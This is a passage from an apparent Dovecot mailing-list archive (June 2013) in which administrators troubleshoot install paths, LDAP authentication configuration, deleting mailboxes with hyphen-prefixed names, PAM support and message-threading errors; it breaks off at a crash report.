grep ^libexecdir config.log >> libexecdir='${exec_prefix}/lib' >> >> grep ^exec_prefix config.log >> exec_prefix='${prefix}' >> >> grep ^prefix config.log >> prefix='/usr/local/dovecot' > That's weird, and wrong. Also, I can't reproduce it; if I run > > ./configure --prefix=/usr/local/dovecot > grep ^libexec config.log > > in the 2.2.1 tarball I get > > libexecdir='${exec_prefix}/libexec' > > as I would have expected. Are you sure you didn't pass a --libexecdir > argument to configure? > > Ben > > > From ron at tohuw.net Tue Jun 4 12:50:16 2013 From: ron at tohuw.net (Ron Scott-Adams) Date: Tue, 4 Jun 2013 05:50:16 -0400 Subject: [Dovecot] Cannot Authenticate via LDAP Message-ID: a login tohuw [myPassword] returns "NO [AUTHENTICATIONFAILED] Authentication failed." I believe I'm missing a configuration detail, but what? info.log: http://pastebin.ca/2388873 debug.log: http://pastebin.ca/2388872 error.log: http://pastebin.ca/2388871 dovecot -n: http://pastebin.ca/2388870 dovecot-ldap.conf.ext summary: http://pastebin.ca/2388867 From kengheng at mysql.cc Tue Jun 4 12:55:18 2013 From: kengheng at mysql.cc (kengheng) Date: Tue, 04 Jun 2013 17:55:18 +0800 Subject: [Dovecot] Make install error In-Reply-To: <20130517111233.GO52079@anubis.morrow.me.uk> References: <5170BEF0.6060306@mysql.cc> <1366713011.11047.345.camel@innu> <51776D42.1080103@mysql.cc> <20130424155049.GB66499@anubis.morrow.me.uk> <5193566E.7030303@mysql.cc> <20130517111233.GO52079@anubis.morrow.me.uk> Message-ID: <51ADB986.6030107@mysql.cc> I've success installed it with a workaround: 1) after error, create a folder /usr/local/dovecot/lib/dovecot/auth 2) make install again, and it will install the file auth at /usr/local/dovecot/lib/dovecot/auth On 5/17/13 7:12 PM, Ben Morrow wrote: > At 5PM +0800 on 15/05/13 you (kengheng) wrote: >> On 4/24/13 11:50 PM, Ben Morrow wrote: >>> At 1PM +0800 on 24/04/13 you (kengheng) wrote: >>>> Hi, I tried remove and make install, same err happended. I noticed from >>>> the log below, it first generate the >>>> "/usr/local/dovecot/lib/dovecot/auth" with checkpassword-reply, and it >>>> is success, the coming generation directory for auth at >>>> "/usr/local/dovecot/lib/dovecot/", it is weird that the make install >>>> generation for file auth and directory auth at same path. It is causing >>>> the issues. >>>> >>>> make[3]: Entering directory `/usr/local/src/dovecot-2.2.1/src/auth' >>>> test -z "/usr/local/dovecot/lib/dovecot" || /usr/bin/mkdir -p >>>> "/usr/local/dovecot/lib/dovecot" >>>> /bin/sh ../../libtool --mode=install /usr/bin/install -c auth >>>> checkpassword-reply '/usr/local/dovecot/lib/dovecot' >>> These files should be installed under libexec; probably >>> /usr/local/dovecot/libexec/dovecot, though I'm not sure how autoconf >>> chooses the libexec directory when you're using an explicit prefix. What >>> do the following give you (in the top-level Dovecot source dir)? >>> >>> grep ^libexecdir config.log >>> grep ^exec_prefix config.log >>> grep ^prefix config.log >> grep ^libexecdir config.log >> libexecdir='${exec_prefix}/lib' >> >> grep ^exec_prefix config.log >> exec_prefix='${prefix}' >> >> grep ^prefix config.log >> prefix='/usr/local/dovecot' > That's weird, and wrong. Also, I can't reproduce it; if I run > > ./configure --prefix=/usr/local/dovecot > grep ^libexec config.log > > in the 2.2.1 tarball I get > > libexecdir='${exec_prefix}/libexec' > > as I would have expected. Are you sure you didn't pass a --libexecdir > argument to configure? > > Ben > > > From micha at krausam.de Tue Jun 4 13:27:52 2013 From: micha at krausam.de (Micha Krause) Date: Tue, 04 Jun 2013 12:27:52 +0200 Subject: [Dovecot] Imap Server as storage backend for dovecot Message-ID: <51ADC128.1030702@krausam.de> Hi, I remember reading about the possibility to configure a namespace to point to another imap server (not dovecot) and use it as a backend for storing mails. However, I could not find any documentation about this, so Im not sure if I remember correctly. Micha Krause From ajb2 at mssl.ucl.ac.uk Tue Jun 4 13:58:50 2013 From: ajb2 at mssl.ucl.ac.uk (Alan Brown) Date: Tue, 04 Jun 2013 11:58:50 +0100 Subject: [Dovecot] Administrative mailbox deletions Message-ID: <51ADC86A.2090805@site.mssl.ucl.ac.uk> I'm in the process of nuking a bunch of dead mailboxes after they've been migrated to other servers - but the accounts have been kept. A simple shell script takes care of most of it, BUT.... (there's always a "but" isn't there?) One user has named all his mailboxes with leading hyphens. ie: -foo -bar -bazz and "doveadm mailbox delete" doesn't like it. Does anyone have the magic sauce needed to escape the - character? Thanks in advance Alan From janfrode at tanso.net Tue Jun 4 14:14:18 2013 From: janfrode at tanso.net (Jan-Frode Myklebust) Date: Tue, 4 Jun 2013 13:14:18 +0200 Subject: [Dovecot] Administrative mailbox deletions In-Reply-To: <51ADC86A.2090805@site.mssl.ucl.ac.uk> References: <51ADC86A.2090805@site.mssl.ucl.ac.uk> Message-ID: <20130604111418.GA9589@mushkin.tanso.net> On Tue, Jun 04, 2013 at 11:58:50AM +0100, Alan Brown wrote: > > > One user has named all his mailboxes with leading hyphens. > > ie: > > -foo > -bar > -bazz > Does anyone have the magic sauce needed to escape the - character? No idea what you've tried, but maybe '--' is enough? doveadm mailbox delete -u $user -- -foo -jf From ajb2 at mssl.ucl.ac.uk Tue Jun 4 14:33:34 2013 From: ajb2 at mssl.ucl.ac.uk (Alan Brown) Date: Tue, 04 Jun 2013 12:33:34 +0100 Subject: [Dovecot] Administrative mailbox deletions In-Reply-To: <2D99A1516AF1E46A5B3E5B73@ritz.innovate.net> References: <51ADC86A.2090805@site.mssl.ucl.ac.uk> <2D99A1516AF1E46A5B3E5B73@ritz.innovate.net> Message-ID: <51ADD08E.1080802@site.mssl.ucl.ac.uk> >> and "doveadm mailbox delete" doesn't like it. >> >> Does anyone have the magic sauce needed to escape the - character? > > An "escaping" that works at the *nix level (not necessarily with > doveadm, but I would assume it works there too) is, e.g., > > rm -- -foo > > i.e., double dashes to nullify the "-" option flag, followed by the > filename. That does work. Thanks. Alan From christian.wiese at securepoint.de Tue Jun 4 14:56:00 2013 From: christian.wiese at securepoint.de (Christian Wiese) Date: Tue, 4 Jun 2013 13:56:00 +0200 Subject: [Dovecot] Cannot Authenticate via LDAP In-Reply-To: References: Message-ID: <20130604135600.75f1889c@cw-desktop> Hi Ron, I didn't had the time to check all logs but the error log. First thing you should check if there are LDAP REFFERALS enabled in the systems ldap.conf. I had a similar looking issue and it took me a good amount of time to figure out that I had to disable LDAP REFFERALS globally. This happened when using an AD as LDAP backend, but also applies to Samba4 as you can see in the following mailing list thread: http://dovecot.markmail.org/message/mjurv4fp4w65u2ib?q=Dovecot+LDA+LDAP+lookups+on+samba4+server+ends+very+often+in+timeouts The settings within the systems ldap.conf might influence dovecot, because libldap (openldap) functions might read the global ldap.conf settings. Hope that helps. Cheers, Chris Am Tue, 4 Jun 2013 05:50:16 -0400 schrieb Ron Scott-Adams : > a login tohuw [myPassword] returns "NO [AUTHENTICATIONFAILED] > Authentication failed." I believe I'm missing a configuration detail, > but what? > > > info.log: http://pastebin.ca/2388873 > > debug.log: http://pastebin.ca/2388872 > > error.log: http://pastebin.ca/2388871 > > dovecot -n: http://pastebin.ca/2388870 > > dovecot-ldap.conf.ext summary: http://pastebin.ca/2388867 From CMarcus at Media-Brokers.com Tue Jun 4 15:09:57 2013 From: CMarcus at Media-Brokers.com (Charles Marcus) Date: Tue, 04 Jun 2013 08:09:57 -0400 Subject: [Dovecot] Administrative mailbox deletions In-Reply-To: <51ADC86A.2090805@site.mssl.ucl.ac.uk> References: <51ADC86A.2090805@site.mssl.ucl.ac.uk> Message-ID: <51ADD915.4010009@Media-Brokers.com> On 2013-06-04 6:58 AM, Alan Brown wrote: > One user has named all his mailboxes with leading hyphens. > > ie: > > -foo > -bar > -bazz How annoying. I have a user that prefixes all of their folders with a leading asterisk (*)... -- Best regards, Charles From christian.wiese at securepoint.de Tue Jun 4 19:44:49 2013 From: christian.wiese at securepoint.de (Christian Wiese) Date: Tue, 4 Jun 2013 18:44:49 +0200 Subject: [Dovecot] Fw: Cannot Authenticate via LDAP Message-ID: <20130604184449.03afa8b7@cw-desktop> Hello Christian, I tried what you suggested by adding "REFERALS off" to /etc/ldap/ldap.conf and restarting slapd and dovecot, but the error persists. On Tue, Jun 4, 2013 at 7:56 AM, Christian Wiese < christian.wiese at securepoint.de> wrote: > Hi Ron, > > I didn't had the time to check all logs but the error log. > First thing you should check if there are LDAP REFFERALS enabled in > the systems ldap.conf. > I had a similar looking issue and it took me a good amount of time to > figure out that I had to disable LDAP REFFERALS globally. > This happened when using an AD as LDAP backend, but also applies to > Samba4 as you can see in the following mailing list thread: > > > http://dovecot.markmail.org/message/mjurv4fp4w65u2ib?q=Dovecot+LDA+LDAP+lookups+on+samba4+server+ends+very+often+in+timeouts > > The settings within the systems ldap.conf might influence dovecot, > because libldap (openldap) functions might read the global ldap.conf > settings. > > Hope that helps. > > Cheers, > Chris > > Am Tue, 4 Jun 2013 05:50:16 -0400 > schrieb Ron Scott-Adams : > > > a login tohuw [myPassword] returns "NO [AUTHENTICATIONFAILED] > > Authentication failed." I believe I'm missing a configuration > > detail, but what? > > > > > > info.log: http://pastebin.ca/2388873 > > > > debug.log: http://pastebin.ca/2388872 > > > > error.log: http://pastebin.ca/2388871 > > > > dovecot -n: http://pastebin.ca/2388870 > > > > dovecot-ldap.conf.ext summary: http://pastebin.ca/2388867 > > From acrow at integrafin.co.uk Tue Jun 4 20:34:45 2013 From: acrow at integrafin.co.uk (Alex Crow) Date: Tue, 04 Jun 2013 18:34:45 +0100 Subject: [Dovecot] Fw: Cannot Authenticate via LDAP In-Reply-To: <20130604184449.03afa8b7@cw-desktop> References: <20130604184449.03afa8b7@cw-desktop> Message-ID: <51AE2535.3090407@integrafin.co.uk> Hi, That can't be the full output of doveconf -n can it? You need to define (examples from my configs using qmail schema; your values will probably be different if you are using AD or openLDAP with a different mail schema) user_attrs = homeDirectory=home,mailMessageStore=mail user_filter = (&(objectClass=qmailUser)(mail=%u)) pass_attrs = userPassword=password,homeDirectory=userdb_home,mailMessageStore=userdb_mail pass_filter = (&(objectClass=qmailUser)(mail=%u)) Also look at the auth_bind parameter. Mine is "yes" because I'm using userdb prefetch as you can see from the pass_attrs param. And you probably need to set up virtual users as well! Cheers Alex On 04/06/13 17:44, Christian Wiese wrote: > Hello Christian, > I tried what you suggested by adding "REFERALS off" > to /etc/ldap/ldap.conf and restarting slapd and dovecot, but the error > persists. > > > On Tue, Jun 4, 2013 at 7:56 AM, Christian Wiese < > christian.wiese at securepoint.de> wrote: > >> Hi Ron, >> >> I didn't had the time to check all logs but the error log. >> First thing you should check if there are LDAP REFFERALS enabled in >> the systems ldap.conf. >> I had a similar looking issue and it took me a good amount of time to >> figure out that I had to disable LDAP REFFERALS globally. >> This happened when using an AD as LDAP backend, but also applies to >> Samba4 as you can see in the following mailing list thread: >> >> >> http://dovecot.markmail.org/message/mjurv4fp4w65u2ib?q=Dovecot+LDA+LDAP+lookups+on+samba4+server+ends+very+often+in+timeouts >> >> The settings within the systems ldap.conf might influence dovecot, >> because libldap (openldap) functions might read the global ldap.conf >> settings. >> >> Hope that helps. >> >> Cheers, >> Chris >> >> Am Tue, 4 Jun 2013 05:50:16 -0400 >> schrieb Ron Scott-Adams : >> >>> a login tohuw [myPassword] returns "NO [AUTHENTICATIONFAILED] >>> Authentication failed." I believe I'm missing a configuration >>> detail, but what? >>> >>> >>> info.log: http://pastebin.ca/2388873 >>> >>> debug.log: http://pastebin.ca/2388872 >>> >>> error.log: http://pastebin.ca/2388871 >>> >>> dovecot -n: http://pastebin.ca/2388870 >>> >>> dovecot-ldap.conf.ext summary: http://pastebin.ca/2388867 >> From acrow at integrafin.co.uk Tue Jun 4 20:43:12 2013 From: acrow at integrafin.co.uk (Alex Crow) Date: Tue, 04 Jun 2013 18:43:12 +0100 Subject: [Dovecot] Fw: Cannot Authenticate via LDAP In-Reply-To: <51AE2535.3090407@integrafin.co.uk> References: <20130604184449.03afa8b7@cw-desktop> <51AE2535.3090407@integrafin.co.uk> Message-ID: <51AE2730.80007@integrafin.co.uk> Forgot to say that the lines below would be part of a file included thusly: passdb { driver = ldap # Path for LDAP configuration file, see example-config/dovecot-ldap.conf.ext args = /etc/dovecot/dovecot-ldap.conf.ext } userdb { driver = prefetch } userdb { driver = ldap args = /etc/dovecot/dovecot-ldap.conf.ext } And in the /ettc/dovecot-ldap.conf.ext as well as the examples I gave you'll also need a line like: uris = ldap://myldapserver1 ldap://myldapserver2 (I use 2 servers with referrals to the master) Also look up iterate_attrs and iterate_filter to let doveadm and other things iterate over accounts. Cheers Alex On 04/06/13 18:34, Alex Crow wrote: > Hi, > > That can't be the full output of doveconf -n can it? > > You need to define (examples from my configs using qmail schema; your > values will probably be different if you are using AD or openLDAP with > a different mail schema) > > user_attrs = homeDirectory=home,mailMessageStore=mail > user_filter = (&(objectClass=qmailUser)(mail=%u)) > pass_attrs = > userPassword=password,homeDirectory=userdb_home,mailMessageStore=userdb_mail > pass_filter = (&(objectClass=qmailUser)(mail=%u)) > > Also look at the auth_bind parameter. Mine is "yes" because I'm using > userdb prefetch as you can see from the pass_attrs param. > > And you probably need to set up virtual users as well! > > Cheers > > Alex > > > On 04/06/13 17:44, Christian Wiese wrote: >> Hello Christian, >> I tried what you suggested by adding "REFERALS off" >> to /etc/ldap/ldap.conf and restarting slapd and dovecot, but the error >> persists. >> >> >> On Tue, Jun 4, 2013 at 7:56 AM, Christian Wiese < >> christian.wiese at securepoint.de> wrote: >> >>> Hi Ron, >>> >>> I didn't had the time to check all logs but the error log. >>> First thing you should check if there are LDAP REFFERALS enabled in >>> the systems ldap.conf. >>> I had a similar looking issue and it took me a good amount of time to >>> figure out that I had to disable LDAP REFFERALS globally. >>> This happened when using an AD as LDAP backend, but also applies to >>> Samba4 as you can see in the following mailing list thread: >>> >>> >>> http://dovecot.markmail.org/message/mjurv4fp4w65u2ib?q=Dovecot+LDA+LDAP+lookups+on+samba4+server+ends+very+often+in+timeouts >>> >>> >>> The settings within the systems ldap.conf might influence dovecot, >>> because libldap (openldap) functions might read the global ldap.conf >>> settings. >>> >>> Hope that helps. >>> >>> Cheers, >>> Chris >>> >>> Am Tue, 4 Jun 2013 05:50:16 -0400 >>> schrieb Ron Scott-Adams : >>> >>>> a login tohuw [myPassword] returns "NO [AUTHENTICATIONFAILED] >>>> Authentication failed." I believe I'm missing a configuration >>>> detail, but what? >>>> >>>> >>>> info.log: http://pastebin.ca/2388873 >>>> >>>> debug.log: http://pastebin.ca/2388872 >>>> >>>> error.log: http://pastebin.ca/2388871 >>>> >>>> dovecot -n: http://pastebin.ca/2388870 >>>> >>>> dovecot-ldap.conf.ext summary: http://pastebin.ca/2388867 >>> > > From acrow at integrafin.co.uk Tue Jun 4 21:04:01 2013 From: acrow at integrafin.co.uk (Alex Crow) Date: Tue, 04 Jun 2013 19:04:01 +0100 Subject: [Dovecot] Fw: Cannot Authenticate via LDAP In-Reply-To: <51AE2730.80007@integrafin.co.uk> References: <20130604184449.03afa8b7@cw-desktop> <51AE2535.3090407@integrafin.co.uk> <51AE2730.80007@integrafin.co.uk> Message-ID: <51AE2C11.9090409@integrafin.co.uk> That'll teach me for looking too quickly: the only things different from mine is the fact you don't look up the email address and you don't use prefetch. Did you try tracing the LDAP server end (eg by upping the log level for your LDAP server or using tcpdump/wireshark?) I'll shut up now before a 3rd foot goes in my trap! Alex On 04/06/13 18:43, Alex Crow wrote: > Forgot to say that the lines below would be part of a file included > thusly: > > passdb { > driver = ldap > > # Path for LDAP configuration file, see > example-config/dovecot-ldap.conf.ext > args = /etc/dovecot/dovecot-ldap.conf.ext > } > > userdb { > driver = prefetch > } > > userdb { > driver = ldap > args = /etc/dovecot/dovecot-ldap.conf.ext > } > > And in the /ettc/dovecot-ldap.conf.ext as well as the examples I gave > you'll also need a line like: > > uris = ldap://myldapserver1 ldap://myldapserver2 > > (I use 2 servers with referrals to the master) > > Also look up iterate_attrs and iterate_filter to let doveadm and other > things iterate over accounts. > > Cheers > > Alex > > On 04/06/13 18:34, Alex Crow wrote: >> Hi, >> >> That can't be the full output of doveconf -n can it? >> >> You need to define (examples from my configs using qmail schema; your >> values will probably be different if you are using AD or openLDAP >> with a different mail schema) >> >> user_attrs = homeDirectory=home,mailMessageStore=mail >> user_filter = (&(objectClass=qmailUser)(mail=%u)) >> pass_attrs = >> userPassword=password,homeDirectory=userdb_home,mailMessageStore=userdb_mail >> pass_filter = (&(objectClass=qmailUser)(mail=%u)) >> >> Also look at the auth_bind parameter. Mine is "yes" because I'm using >> userdb prefetch as you can see from the pass_attrs param. >> >> And you probably need to set up virtual users as well! >> >> Cheers >> >> Alex >> >> >> On 04/06/13 17:44, Christian Wiese wrote: >>> Hello Christian, >>> I tried what you suggested by adding "REFERALS off" >>> to /etc/ldap/ldap.conf and restarting slapd and dovecot, but the error >>> persists. >>> >>> >>> On Tue, Jun 4, 2013 at 7:56 AM, Christian Wiese < >>> christian.wiese at securepoint.de> wrote: >>> >>>> Hi Ron, >>>> >>>> I didn't had the time to check all logs but the error log. >>>> First thing you should check if there are LDAP REFFERALS enabled in >>>> the systems ldap.conf. >>>> I had a similar looking issue and it took me a good amount of time to >>>> figure out that I had to disable LDAP REFFERALS globally. >>>> This happened when using an AD as LDAP backend, but also applies to >>>> Samba4 as you can see in the following mailing list thread: >>>> >>>> >>>> http://dovecot.markmail.org/message/mjurv4fp4w65u2ib?q=Dovecot+LDA+LDAP+lookups+on+samba4+server+ends+very+often+in+timeouts >>>> >>>> >>>> The settings within the systems ldap.conf might influence dovecot, >>>> because libldap (openldap) functions might read the global ldap.conf >>>> settings. >>>> >>>> Hope that helps. >>>> >>>> Cheers, >>>> Chris >>>> >>>> Am Tue, 4 Jun 2013 05:50:16 -0400 >>>> schrieb Ron Scott-Adams : >>>> >>>>> a login tohuw [myPassword] returns "NO [AUTHENTICATIONFAILED] >>>>> Authentication failed." I believe I'm missing a configuration >>>>> detail, but what? >>>>> >>>>> >>>>> info.log: http://pastebin.ca/2388873 >>>>> >>>>> debug.log: http://pastebin.ca/2388872 >>>>> >>>>> error.log: http://pastebin.ca/2388871 >>>>> >>>>> dovecot -n: http://pastebin.ca/2388870 >>>>> >>>>> dovecot-ldap.conf.ext summary: http://pastebin.ca/2388867 >>>> >> >> > > From ron at tohuw.net Tue Jun 4 21:04:27 2013 From: ron at tohuw.net (Ron Scott-Adams) Date: Tue, 4 Jun 2013 14:04:27 -0400 Subject: [Dovecot] Fw: Cannot Authenticate via LDAP In-Reply-To: <51AE2730.80007@integrafin.co.uk> References: <20130604184449.03afa8b7@cw-desktop> <51AE2535.3090407@integrafin.co.uk> <51AE2730.80007@integrafin.co.uk> Message-ID: Hi Alex, thanks for your input. As you might have surmised from my doveconf output, I had things horribly misconfigured. :) Everything is dandy now, I just had to RTFM and understand userdb/passdb and the ldap settings better. My new configuration follows: BEGIN DOVECONF: # 2.0.19: /etc/dovecot/dovecot.conf # OS: Linux 3.2.0-45-generic x86_64 Ubuntu 12.04.2 LTS auth_debug = yes auth_debug_passwords = yes auth_verbose = yes log_path = /var/log/dovecot.log mail_location = maildir:~/.maildir passdb { driver = pam } passdb { args = /etc/dovecot/dovecot-ldap.conf.ext driver = ldap } protocols = " imap pop3" ssl_cert = wrote: > Forgot to say that the lines below would be part of a file included thusly: > > passdb { > driver = ldap > > # Path for LDAP configuration file, see example-config/dovecot-ldap.** > conf.ext > args = /etc/dovecot/dovecot-ldap.**conf.ext > } > > userdb { > driver = prefetch > } > > userdb { > driver = ldap > args = /etc/dovecot/dovecot-ldap.**conf.ext > } > > And in the /ettc/dovecot-ldap.conf.ext as well as the examples I gave > you'll also need a line like: > > uris = ldap://myldapserver1 ldap://myldapserver2 > > (I use 2 servers with referrals to the master) > > Also look up iterate_attrs and iterate_filter to let doveadm and other > things iterate over accounts. > > Cheers > > Alex > > > On 04/06/13 18:34, Alex Crow wrote: > >> Hi, >> >> That can't be the full output of doveconf -n can it? >> >> You need to define (examples from my configs using qmail schema; your >> values will probably be different if you are using AD or openLDAP with a >> different mail schema) >> >> user_attrs = homeDirectory=home,**mailMessageStore=mail >> user_filter = (&(objectClass=qmailUser)(**mail=%u)) >> pass_attrs = userPassword=password,**homeDirectory=userdb_home,** >> mailMessageStore=userdb_mail >> pass_filter = (&(objectClass=qmailUser)(**mail=%u)) >> >> Also look at the auth_bind parameter. Mine is "yes" because I'm using >> userdb prefetch as you can see from the pass_attrs param. >> >> And you probably need to set up virtual users as well! >> >> Cheers >> >> Alex >> >> >> On 04/06/13 17:44, Christian Wiese wrote: >> >>> Hello Christian, >>> I tried what you suggested by adding "REFERALS off" >>> to /etc/ldap/ldap.conf and restarting slapd and dovecot, but the error >>> persists. >>> >>> >>> On Tue, Jun 4, 2013 at 7:56 AM, Christian Wiese < >>> christian.wiese at securepoint.de**> wrote: >>> >>> Hi Ron, >>>> >>>> I didn't had the time to check all logs but the error log. >>>> First thing you should check if there are LDAP REFFERALS enabled in >>>> the systems ldap.conf. >>>> I had a similar looking issue and it took me a good amount of time to >>>> figure out that I had to disable LDAP REFFERALS globally. >>>> This happened when using an AD as LDAP backend, but also applies to >>>> Samba4 as you can see in the following mailing list thread: >>>> >>>> >>>> http://dovecot.markmail.org/**message/mjurv4fp4w65u2ib?q=** >>>> Dovecot+LDA+LDAP+lookups+on+**samba4+server+ends+very+often+** >>>> in+timeouts >>>> >>>> The settings within the systems ldap.conf might influence dovecot, >>>> because libldap (openldap) functions might read the global ldap.conf >>>> settings. >>>> >>>> Hope that helps. >>>> >>>> Cheers, >>>> Chris >>>> >>>> Am Tue, 4 Jun 2013 05:50:16 -0400 >>>> schrieb Ron Scott-Adams : >>>> >>>> a login tohuw [myPassword] returns "NO [AUTHENTICATIONFAILED] >>>>> Authentication failed." I believe I'm missing a configuration >>>>> detail, but what? >>>>> >>>>> >>>>> info.log: http://pastebin.ca/2388873 >>>>> >>>>> debug.log: http://pastebin.ca/2388872 >>>>> >>>>> error.log: http://pastebin.ca/2388871 >>>>> >>>>> dovecot -n: http://pastebin.ca/2388870 >>>>> >>>>> dovecot-ldap.conf.ext summary: http://pastebin.ca/2388867 >>>>> >>>> >>>> >> >> > From acrow at integrafin.co.uk Tue Jun 4 21:07:06 2013 From: acrow at integrafin.co.uk (Alex Crow) Date: Tue, 04 Jun 2013 19:07:06 +0100 Subject: [Dovecot] Fw: Cannot Authenticate via LDAP In-Reply-To: References: <20130604184449.03afa8b7@cw-desktop> <51AE2535.3090407@integrafin.co.uk> <51AE2730.80007@integrafin.co.uk> Message-ID: <51AE2CCA.5090107@integrafin.co.uk> Hi Ron, TBH you were doing most things right anyway, I misread your pastebin stuff. But I'm glad the details helped you, and you're welcome! Cheers Alex On 04/06/13 19:04, Ron Scott-Adams wrote: > Hi Alex, thanks for your input. As you might have surmised from my > doveconf output, I had things horribly misconfigured. :) Everything is > dandy now, I just had to RTFM and understand userdb/passdb and the > ldap settings better. My new configuration follows: > > BEGIN DOVECONF: > # 2.0.19: /etc/dovecot/dovecot.conf > # OS: Linux 3.2.0-45-generic x86_64 Ubuntu 12.04.2 LTS > auth_debug = yes > auth_debug_passwords = yes > auth_verbose = yes > log_path = /var/log/dovecot.log > mail_location = maildir:~/.maildir > passdb { > driver = pam > } > passdb { > args = /etc/dovecot/dovecot-ldap.conf.ext > driver = ldap > } > protocols = " imap pop3" > ssl_cert = ssl_key = ssl_parameters_regenerate = 0 > userdb { > driver = passwd > } > userdb { > args = /etc/dovecot/dovecot-ldap-userdb.conf.ext > driver = ldap > } > verbose_ssl = yes > > END DOVECONF > ----------------------------------------------------------- > BEGIN DOVECOT-LDAP.CONF.EXT > > uris = ldap://localhost:389 > dn = uid=dovecot,ou=Services,dc=tohuw,dc=net > dnpass = [redacted] > debug_level = -1 > auth_bind = yes > auth_bind_userdn = uid=%u,ou=Users,dc=tohuw,dc=net > base = dc=tohuw,dc=net > user_filter = (uid=%u) > pass_filter = (uid=%u) > iterate_attrs = uid=user > default_pass_scheme = SSHA > > END DOVECOT-LDAP.CONF.EXT > ----------------------------------------------------------- > > The dovecot-ldap-userdb.conf.ext is a symlink, as the documentation > suggests I do. > > > On Tue, Jun 4, 2013 at 1:43 PM, Alex Crow > wrote: > > Forgot to say that the lines below would be part of a file > included thusly: > > passdb { > driver = ldap > > # Path for LDAP configuration file, see > example-config/dovecot-ldap.conf.ext > args = /etc/dovecot/dovecot-ldap.conf.ext > } > > userdb { > driver = prefetch > } > > userdb { > driver = ldap > args = /etc/dovecot/dovecot-ldap.conf.ext > } > > And in the /ettc/dovecot-ldap.conf.ext as well as the examples I > gave you'll also need a line like: > > uris = ldap://myldapserver1 ldap://myldapserver2 > > (I use 2 servers with referrals to the master) > > Also look up iterate_attrs and iterate_filter to let doveadm and > other things iterate over accounts. > > Cheers > > Alex > > > On 04/06/13 18:34, Alex Crow wrote: > > Hi, > > That can't be the full output of doveconf -n can it? > > You need to define (examples from my configs using qmail > schema; your values will probably be different if you are > using AD or openLDAP with a different mail schema) > > user_attrs = homeDirectory=home,mailMessageStore=mail > user_filter = (&(objectClass=qmailUser)(mail=%u)) > pass_attrs = > userPassword=password,homeDirectory=userdb_home,mailMessageStore=userdb_mail > pass_filter = (&(objectClass=qmailUser)(mail=%u)) > > Also look at the auth_bind parameter. Mine is "yes" because > I'm using userdb prefetch as you can see from the pass_attrs > param. > > And you probably need to set up virtual users as well! > > Cheers > > Alex > > > On 04/06/13 17:44, Christian Wiese wrote: > > Hello Christian, > I tried what you suggested by adding "REFERALS off" > to /etc/ldap/ldap.conf and restarting slapd and dovecot, > but the error > persists. > > > On Tue, Jun 4, 2013 at 7:56 AM, Christian Wiese < > christian.wiese at securepoint.de > > wrote: > > Hi Ron, > > I didn't had the time to check all logs but the error log. > First thing you should check if there are LDAP > REFFERALS enabled in > the systems ldap.conf. > I had a similar looking issue and it took me a good > amount of time to > figure out that I had to disable LDAP REFFERALS globally. > This happened when using an AD as LDAP backend, but > also applies to > Samba4 as you can see in the following mailing list > thread: > > > http://dovecot.markmail.org/message/mjurv4fp4w65u2ib?q=Dovecot+LDA+LDAP+lookups+on+samba4+server+ends+very+often+in+timeouts > > > The settings within the systems ldap.conf might > influence dovecot, > because libldap (openldap) functions might read the > global ldap.conf > settings. > > Hope that helps. > > Cheers, > Chris > > Am Tue, 4 Jun 2013 05:50:16 -0400 > schrieb Ron Scott-Adams >: > > a login tohuw [myPassword] returns "NO > [AUTHENTICATIONFAILED] > Authentication failed." I believe I'm missing a > configuration > detail, but what? > > > info.log: http://pastebin.ca/2388873 > > debug.log: http://pastebin.ca/2388872 > > error.log: http://pastebin.ca/2388871 > > dovecot -n: http://pastebin.ca/2388870 > > dovecot-ldap.conf.ext summary: > http://pastebin.ca/2388867 > > > > > > > > -- > This message has been scanned for viruses and > dangerous content by *MailScanner* , and is > believed to be clean. From mariajose1982 at gmail.com Wed Jun 5 04:52:50 2013 From: mariajose1982 at gmail.com (=?ISO-8859-1?Q?Maria_Jose_Ya=F1ez_Dacosta?=) Date: Tue, 4 Jun 2013 22:52:50 -0300 Subject: [Dovecot] Support not compiled in for passdb driver 'pam' + telnet localhost imap. Message-ID: Hi!, I Install dovecot version 2.1.16 on CentOS 6.4 x86_64. When I try to test the installation (by telnet localhost imap) the following error occurs: "auth: Fatal: Support not compiled in for passdb driver 'pam'". I do not discover what caused this. Here I leave the configuration data and the log. Thanks ------------------------------------ / var / log / maillog --------------------------------------- May 31 15:45:55 prueba-mail dovecot: master: Dovecot v2.1.16 starting up (core dumps disabled) May 31 15:46:04 prueba-mail dovecot: auth: Fatal: Support not compiled in for passdb driver 'pam' May 31 15:46:04 prueba-mail dovecot: master: Error: service(auth): command startup failed, throttling for 2 secs May 31 15:46:04 prueba-mail dovecot: imap-login: Disconnected: Auth process broken (disconnected before greeting, waited 0 secs): user=<>, rip=::1, lip=::1, secured, session= ------------------------------------ doveconf-n -------------------------------------------------- # 2.1.16: /usr/local/etc/dovecot/dovecot.conf # OS: Linux 2.6.32-358.6.2.el6.x86_64 x86_64 CentOS release 6.4 (Final) auth_use_winbind = yes namespace inbox { inbox = yes location = mailbox Drafts { special_use = \Drafts } mailbox Junk { special_use = \Junk } mailbox Sent { special_use = \Sent } mailbox "Sent Messages" { special_use = \Sent } mailbox Trash { special_use = \Trash } passdb { driver = pam } protocols = imap pop3 ssl = no userdb { args = uid=10000 gid=10000 home=/mail/%d/%n allow_all_users=yes driver = static } -- Maria Jos? From oajara at frsf.utn.edu.ar Wed Jun 5 07:22:05 2013 From: oajara at frsf.utn.edu.ar (Oscar A. Jara) Date: Wed, 05 Jun 2013 01:22:05 -0300 Subject: [Dovecot] Error: Threading lost Message ID Message-ID: <8705846dda1649c7a48099f5da80d53f@frsf.utn.edu.ar> Hello everyone, I have just put in production dovecot imap and pop3 in replacement of courier in a setup of 700 accounts aprox. Dovecot release running is 1.2.16 in a Linux CentOS 5.8. Seems like some accounts are having problems dealing with message threading, as I read lines like this one in my logs: IMAP(some_user): Error: Threading lost Message ID ...and some of those accounts cannot even list the emails. I temporarily got rid of this problem deactivating threading on those accounts but I would like to solve it. I found a patch that seams to deal with this problem at http://hg.dovecot.org/dovecot-1.2/rev/76023d59c3b2 but it would be weird that CentOS wouldn't have release a patched version of the package. Am I missing something here? Thanks in advance! __________ Information from ESET Mail Security, version of virus signature database 8412 (20130604) __________ The message was checked by ESET Mail Security. http://www.eset.com From ib at ice-dev.com Wed Jun 5 11:38:11 2013 From: ib at ice-dev.com (ib) Date: Wed, 05 Jun 2013 10:38:11 +0200 Subject: [Dovecot] Crash dovecot 1.2.15 Message-ID: <51AEF8F3.2020709@ice-dev.com> Hi everybody We have a probleme with dovecot Jun 05 06:26:01 dovecot: Warning: SIGHUP received - reloading configuration Jun 05 06:26:02 dovecot: Error: Raw backtrace: 